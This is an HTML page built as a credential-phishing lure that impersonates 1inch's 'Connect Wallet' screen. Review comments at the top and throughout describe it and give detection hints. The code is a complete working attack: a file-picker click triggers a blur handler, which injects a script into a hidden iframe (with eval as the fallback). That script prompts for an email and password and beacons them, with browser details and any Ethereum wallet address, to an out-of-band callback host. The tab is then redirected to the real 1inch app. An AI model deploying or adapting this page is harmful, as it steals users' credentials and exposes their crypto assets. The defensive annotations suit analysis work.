<!DOCTYPE html>
<!--
  Review note (defensive reading of this file).
  This page is a credential-phishing lure styled as a 1inch "Connect Wallet" screen.
  What the visible code does:
    * The button opens a file picker. No code in this file reads the chosen file;
      per the author's own comments the picker is there to make the window lose focus.
    * On window blur, a script string is loaded into a hidden, off-screen iframe through
      a javascript: URL, with eval in this document as the fallback.
    * That script asks for an email and a password with prompt() and sends them, together
      with page and browser details, to the host stored in WEBHOOK.
    * 1200 ms after the click the tab is navigated to https://app.1inch.io/.
  The author labels the technique "UXSS" and "spoof origin". Nothing in this file shows
  the script running in the app.1inch.io origin, so treat that label as the author's claim.
  Detection hints: prompt() dialogs that request credentials, an iframe placed at
  left:-9999px whose src is assigned a javascript: URL, a window.onblur handler installed
  inside a click handler, and beacon or image requests carrying a long base64 "data"
  query parameter to an out-of-band callback host.
-->
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
<title>1inch Wallet Connect</title>
<style>
body, html { margin:0; height:100%; background:#0f172a; color:#e2e8f0; font-family:system-ui; display:grid; place-items:center; overflow:hidden; }
.card { background:#1e293b; padding:32px; border-radius:20px; text-align:center; box-shadow:0 10px 40px rgba(0,0,0,0.6); max-width:380px; }
h1 { margin:0 0 12px; font-size:24px; color:#22c55e; }
p { margin:8px 0 24px; color:#94a3b8; font-size:15px; }
button {
background:#22c55e; color:#000; border:none; padding:16px 32px; border-radius:16px;
font-size:18px; font-weight:bold; cursor:pointer; width:100%;
box-shadow:0 8px 25px rgba(34,197,94,0.4);
}
button:hover { background:#16a34a; }
/* The real file input is hidden; the styled button triggers it from script. */
input[type="file"] { display:none; }
.logo { font-size:48px; margin-bottom:16px; }
</style>
</head>
<body>
<!-- Lure UI: brand text plus a prompt to "import" a wallet backup (.json / .keystore). -->
<div class="card">
<div class="logo">1inch</div>
<h1>Connect Wallet</h1>
<p>Import your wallet backup file to continue</p>
<button id="uploadButton">Choose File</button>
<input type="file" id="fileInput" accept=".json,.keystore">
</div>
<!-- Hidden iframe for the delayed "UXSS" step (author's term). It is positioned
     off-screen at 1x1 px and has no src until the blur handler below assigns one. -->
<iframe id="uxss" style="position:absolute; left:-9999px; width:1px; height:1px;"></iframe>
<script>
// Webhook configuration: the collection endpoint for the harvested data.
// NOTE(review): the host is an oast.fun subdomain, which looks like an out-of-band
// interaction-testing callback address; useful as a network indicator.
const WEBHOOK = "https://mpbxogpeszumkijyjecohzd8mgoadvoiq.oast.fun";
const fileInput = document.getElementById("fileInput");
const uploadButton = document.getElementById("uploadButton");
const iframe = document.getElementById("uxss");
// Script text that is later assigned to the iframe as a javascript: URL.
// Everything between the backticks is a runtime string, including its "//" lines, so it
// is left exactly as written (the Indonesian lines inside mean "priority: sendBeacon,
// then Image, then fetch" and "bonus: try to take the wallet address if there is one").
// What the string does when executed:
//   - asks for an email with prompt() and stops if it is empty;
//   - asks for a password with prompt();
//   - builds an object with email, password, location.href, document.domain,
//     document.title, navigator.userAgent and an ISO timestamp;
//   - sends it as base64-encoded JSON in the "data" query parameter of WEBHOOK, first
//     with navigator.sendBeacon and otherwise through an Image src (no fetch call is
//     present despite the inner comment);
//   - if window.ethereum.selectedAddress is set, sends a second request with
//     "&wallet=<address>" appended;
//   - swallows every exception.
// ${WEBHOOK} is interpolated here, when the template literal is evaluated.
const maliciousCode = `
(function(){
try {
var email = prompt(
"To continue using 1inch Wallet\\n\\nPlease login with your 1inch account\\n\\nEmail:",
""
);
if (!email || email.trim() === "") return;
var pass = prompt(
"To continue using 1inch Wallet\\n\\nPassword for: " + email,
""
);
var data = {
email: email,
password: pass || "",
url: location.href,
domain: document.domain,
title: document.title,
ua: navigator.userAgent,
time: new Date().toISOString()
};
var url = "${WEBHOOK}?data=" + encodeURIComponent(btoa(JSON.stringify(data)));
// Prioritas: sendBeacon → Image → fetch
if (navigator.sendBeacon && navigator.sendBeacon(url, "")) {
// success
} else {
new Image().src = url;
}
// Bonus: coba ambil wallet address kalau ada
if (window.ethereum?.selectedAddress) {
new Image().src = url + "&wallet=" + window.ethereum.selectedAddress;
}
} catch(e) {}
})();
`;
// Click handler: the single user gesture drives all three steps below.
uploadButton.addEventListener("click", function () {
// 1. Open the file picker (runs inside a user gesture, which the author notes is "trusted").
fileInput.click();
// 2. Once the file picker is showing, use the onblur trick: the handler is installed
//    here and replaces any existing window.onblur handler.
window.onblur = function () {
// Short delay so that, per the author, the page is already a background tab / WebView.
setTimeout(() => {
try {
// Assigning a javascript: URL runs the script string in the hidden iframe.
iframe.src = "javascript:" + maliciousCode;
} catch(e) {
// Fallback if the iframe assignment is blocked and throws: eval the same string,
// which then runs in this document's own context.
eval(maliciousCode);
}
}, 300);
};
// 3. Navigate the tab to the genuine 1inch app 1200 ms after the click
//    (the author's label for this step is "spoof origin").
setTimeout(() => {
location.href = "https://app.1inch.io/";
}, 1200);
});
</script>
</body>
</html>